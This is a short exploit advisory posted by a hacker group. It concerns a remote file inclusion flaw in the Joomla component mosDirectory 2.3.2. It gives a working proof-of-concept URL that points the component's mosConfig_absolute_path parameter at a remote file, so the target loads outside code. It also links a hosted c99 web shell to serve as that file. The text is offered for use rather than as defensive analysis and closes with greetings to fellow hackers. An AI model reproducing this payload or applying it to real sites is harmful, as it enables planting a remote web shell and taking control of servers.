The Joomla component mosDirectory version 2.3.2 suffers from a remote file inclusion vulnerability.
490c63ba7dd88d798965af95fe6b5d058fc28fe5ec31dc5c94a55f3d81855acf
--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+ Joomla Component mosDirectory 2.3.2 Remote File Inclusion +==--
--==+=============================================================================+==--
Software: Joomla Component mosDirectory 2.3.2
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: https://www.box.net/shared/kdp2h6dbe1
txtShell: https://yee7.com/shells/c99.txt
##############################
==============
Dork: priv8 ;)
PoC:
https://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=https://shell.txt?
###############################
by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members